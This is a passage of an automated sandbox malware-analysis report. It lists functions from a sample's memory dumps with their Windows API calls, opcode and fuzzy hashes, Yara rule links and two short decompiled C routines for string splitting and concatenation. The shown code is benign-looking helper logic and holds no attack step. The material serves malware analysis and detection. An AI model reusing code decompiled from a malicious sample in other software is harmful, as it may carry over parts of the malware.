                              • Opcode Fuzzy Hash: 3bcd91d57a738340d0b34d0d07b2542211db1dcfc52b46d720a9a0cd8b36588b
                              • Instruction Fuzzy Hash: 65314A36900108EFCF129FA9DC4589EBFBAFF44310F12419AF916A6261C7719E61DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DEC94, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053C570C: lstrlenW.KERNEL32(?), ref: 053C5730
                                • Part of subcall function 053C570C: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 053C5742
                                • Part of subcall function 053C570C: wcstombs.NTDLL ref: 053C5750
                                • Part of subcall function 053C570C: lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 053C5774
                                • Part of subcall function 053C570C: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 053C5789
                                • Part of subcall function 053C570C: mbstowcs.NTDLL ref: 053C5796
                                • Part of subcall function 053C570C: HeapFree.KERNEL32(00000000,00000000), ref: 053C57A8
                                • Part of subcall function 053C570C: HeapFree.KERNEL32(00000000,00000000,?,?), ref: 053C57C2
                              • GetLastError.KERNEL32 ref: 053DED33
                                • Part of subcall function 053CA23E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 053CA2EC
                                • Part of subcall function 053CA23E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 053CA310
                                • Part of subcall function 053CA23E: HeapFree.KERNEL32(00000000,00000000,?,00000000,053F01F4,?,?,053C121E,?,00000000,?,?), ref: 053CA31E
                              • HeapFree.KERNEL32(00000000,?), ref: 053DED4F
                              • HeapFree.KERNEL32(00000000,?), ref: 053DED60
                              • SetLastError.KERNEL32(00000000), ref: 053DED63
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                              • String ID:
                              • API String ID: 3867366388-0
                              • Opcode ID: ec8f057af93b5217fa29db80c886d99d617e1ba591527655807e0cb832d26c6c
                              • Instruction ID: 2f0bf462bcfa1017b9ded17a3108a420393200ef037e3117c14af5be83040b4c
                              • Opcode Fuzzy Hash: ec8f057af93b5217fa29db80c886d99d617e1ba591527655807e0cb832d26c6c
                              • Instruction Fuzzy Hash: 86312936900108EFCF129F99DD8589EBFB9FF44310F14455AF916AA261CB718A61EFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D282F, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 58%
                              			E049D282F(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E049D55DC(_t2);
				if(_t34 != 0) {
					_t30 = E049D55DC(_t28);
					if(_t30 == 0) {
						E049D6DFA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E049DAAD2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E049DAAD2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                              0x049d282f
                              0x049d2839
                              0x049d283b
                              0x049d2841
                              0x049d2841
                              0x049d284a
                              0x049d284e
                              0x049d285a
                              0x049d285e
                              0x049d28d2
                              0x049d2860
                              0x049d2860
                              0x049d2864
                              0x049d286b
                              0x049d286e
                              0x049d2888
                              0x049d2877
                              0x049d2877
                              0x049d287b
                              0x049d287e
                              0x049d2883
                              0x049d2883
                              0x049d288d
                              0x049d28b5
                              0x049d28bb
                              0x049d28be
                              0x049d288f
                              0x049d2891
                              0x049d2899
                              0x049d28a4
                              0x049d28a9
                              0x049d28a9
                              0x049d28c5
                              0x049d28cc
                              0x049d28cd
                              0x049d28cd
                              0x049d285e
                              0x049d28dd

                              APIs
                              • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,049D56E4,00000000,00000000,?,05819618,?,?,049D3B91,?,05819618), ref: 049D283B
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                                • Part of subcall function 049DAAD2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,049D2869,00000000,00000001,00000001,?,?,049D56E4,00000000,00000000,?,05819618), ref: 049DAAE0
                                • Part of subcall function 049DAAD2: StrChrA.SHLWAPI(?,0000003F,?,?,049D56E4,00000000,00000000,?,05819618,?,?,049D3B91,?,05819618,0000EA60,?), ref: 049DAAEA
                              • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,049D56E4,00000000,00000000,?,05819618,?,?,049D3B91), ref: 049D2899
                              • lstrcpy.KERNEL32(00000000,?), ref: 049D28A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 049D28B5
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                              • String ID:
                              • API String ID: 3767559652-0
                              • Opcode ID: fd4dab3f5c2375e2d4a86176eea26990340cb912f03e7c1e472e4ce227340921
                              • Instruction ID: 56221d6fbaadbf4dd706c0dfb03b1e2b21529be6ada707d94bceb836b91981b0
                              • Opcode Fuzzy Hash: fd4dab3f5c2375e2d4a86176eea26990340cb912f03e7c1e472e4ce227340921
                              • Instruction Fuzzy Hash: 0621A272504259BFDF025F64C844AAEBFA9EF85294F05C0B4F9099B201E734ED55D7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D8EAC, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(747C81D0,00000008,?,00000000,?,?,053E2B07,747C81D0,747C81D0,00000000,00000008,0000EA60,74785520,?,?,053C329A), ref: 053D8EB8
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                                • Part of subcall function 053E849C: StrChrA.SHLWAPI(?,0000002F,00000000,747C81D0,053D8EE6,747C81D0,00000001,00000001,?,?,053E2B07,747C81D0,747C81D0,00000000,00000008,0000EA60), ref: 053E84AA
                                • Part of subcall function 053E849C: StrChrA.SHLWAPI(?,0000003F,?,?,053E2B07,747C81D0,747C81D0,00000000,00000008,0000EA60,74785520,?,?,053C329A,?,?), ref: 053E84B4
                              • memcpy.NTDLL(00000000,747C81D0,747C81D0,747C81D0,00000001,00000001,?,?,053E2B07,747C81D0,747C81D0,00000000,00000008,0000EA60,74785520), ref: 053D8F16
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 053D8F26
                              • lstrcpy.KERNEL32(00000000,747C81D0), ref: 053D8F32
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                              • String ID:
                              • API String ID: 3767559652-0
                              • Opcode ID: f50063bd11b24026b458cff52985c57a74f71e69e5fe012e18b14398797a3fa8
                              • Instruction ID: 2c153829580c377e786613ed1d64faa20f524ff73a7548f1f0042e0fb9b3fdf2
                              • Opcode Fuzzy Hash: f50063bd11b24026b458cff52985c57a74f71e69e5fe012e18b14398797a3fa8
                              • Instruction Fuzzy Hash: 9F215C73908255ABCB129F68E848BAEFFFEAF15290F054054F9059B242DA71DA1087B0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CE707, Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 88606a831818490d4dc6dcba95992888581799010516fa77a7e37b89fcee84fd
                              • Instruction ID: 8d419d271a5aa2b308aa1d6f2cd082d0058da564aee313f7efb66d16e1b706f5
                              • Opcode Fuzzy Hash: 88606a831818490d4dc6dcba95992888581799010516fa77a7e37b89fcee84fd
                              • Instruction Fuzzy Hash: 8011CEB2600919FBDB219FA1EC44E6ABF6CFF08304B050559F949A1840D3B2B9B1ABD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D5434, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D5434(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E049D55DC(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                              0x049d5449
                              0x049d544d
                              0x049d5457
                              0x049d545e
                              0x049d5461
                              0x049d5463
                              0x049d546b
                              0x049d5470
                              0x049d547e
                              0x049d5483
                              0x049d548d

                              APIs
                              • lstrlenW.KERNEL32(004F0053,?,74785520,00000008,058193AC,?,049D4CD5,004F0053,058193AC,?,?,?,?,?,?,049D50D9), ref: 049D5444
                              • lstrlenW.KERNEL32(049D4CD5,?,049D4CD5,004F0053,058193AC,?,?,?,?,?,?,049D50D9), ref: 049D544B
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • memcpy.NTDLL(00000000,004F0053,747869A0,?,?,049D4CD5,004F0053,058193AC,?,?,?,?,?,?,049D50D9), ref: 049D546B
                              • memcpy.NTDLL(747869A0,049D4CD5,00000002,00000000,004F0053,747869A0,?,?,049D4CD5,004F0053,058193AC), ref: 049D547E
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: lstrlenmemcpy$AllocateHeap
                              • String ID:
                              • API String ID: 2411391700-0
                              • Opcode ID: 934fb915eb99af7e93de0c4088fe5c5b971d134272750533066820f75a6b42a9
                              • Instruction ID: f597b672b20e58f2c9eb10ae5d0e7014135d0312796ca1b2a784d30814fc1b35
                              • Opcode Fuzzy Hash: 934fb915eb99af7e93de0c4088fe5c5b971d134272750533066820f75a6b42a9
                              • Instruction Fuzzy Hash: CAF04F36900118BFCF11EFA8CC44CDE7BACEF482A8B118062FD04D7111E775EA108BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D951E, Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(69B25F44,?,?,00000000,053D069E,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 053D952F
                              • lstrlen.KERNEL32(?,?,?,00000000,053D069E,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 053D9534
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • memcpy.NTDLL(00000000,?,00000000,?,?,?,00000000,053D069E,00000000,?,?,00000000,69B25F44,?,?,?), ref: 053D9550
                              • lstrcpy.KERNEL32(00000000,?), ref: 053D956E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                              • String ID:
                              • API String ID: 1697500751-0
                              • Opcode ID: 967530e39dcf3c89a8cebbfba4e4f54f8d6c70dd8c9e64329ecd1355aa1e82d8
                              • Instruction ID: f86c5f6a0e5a6589c74dacac3b16a0b93ffdb7348a217afa16600f763f748140
                              • Opcode Fuzzy Hash: 967530e39dcf3c89a8cebbfba4e4f54f8d6c70dd8c9e64329ecd1355aa1e82d8
                              • Instruction Fuzzy Hash: 65F0C27B904741ABD3229AA9AC4CF5BBFADBF85251F050525F94587101D671C5048BB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D6F6D, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(05819B58,00000000,00000000,?,049D6507,00000000), ref: 049D6F7D
                              • lstrlen.KERNEL32(?), ref: 049D6F85
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • lstrcpy.KERNEL32(00000000,05819B58), ref: 049D6F99
                              • lstrcat.KERNEL32(00000000,?), ref: 049D6FA4
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                              • String ID:
                              • API String ID: 74227042-0
                              • Opcode ID: effc7c3e6db9b41294155c6ff4f221218eb21b3f658e2cf9dd69ec8458c26f18
                              • Instruction ID: fde4b6aed97efd1fa7f1283a5e94b4a6bb9bad05c0f9ef1caf54049ed5a44eeb
                              • Opcode Fuzzy Hash: effc7c3e6db9b41294155c6ff4f221218eb21b3f658e2cf9dd69ec8458c26f18
                              • Instruction Fuzzy Hash: 15E0923350A6216B8A119FE8DC48C9FBFADEF996617040536F600D3100C7289C45CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D3EA2, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(064F8560,00000000,00000000,74785520,053DF2A8,00000000), ref: 053D3EB2
                              • lstrlen.KERNEL32(?), ref: 053D3EBA
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • lstrcpy.KERNEL32(00000000,064F8560), ref: 053D3ECE
                              • lstrcat.KERNEL32(00000000,?), ref: 053D3ED9
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                              • String ID:
                              • API String ID: 74227042-0
                              • Opcode ID: 89bc2b5908f356035958eaa0a66604d8de38bdd734d884b1122771a841704533
                              • Instruction ID: 7b601441c682462d2b6294694c24049fd24cd9f9f82a8c7a9214ab22065dfabb
                              • Opcode Fuzzy Hash: 89bc2b5908f356035958eaa0a66604d8de38bdd734d884b1122771a841704533
                              • Instruction Fuzzy Hash: 8CE0ED73A116256B87229AE8AC4CCABFFACEFC9751B05041AF601DB100DB659D058BA1
                              Uniqueness

                              Uniqueness Score: -1.00%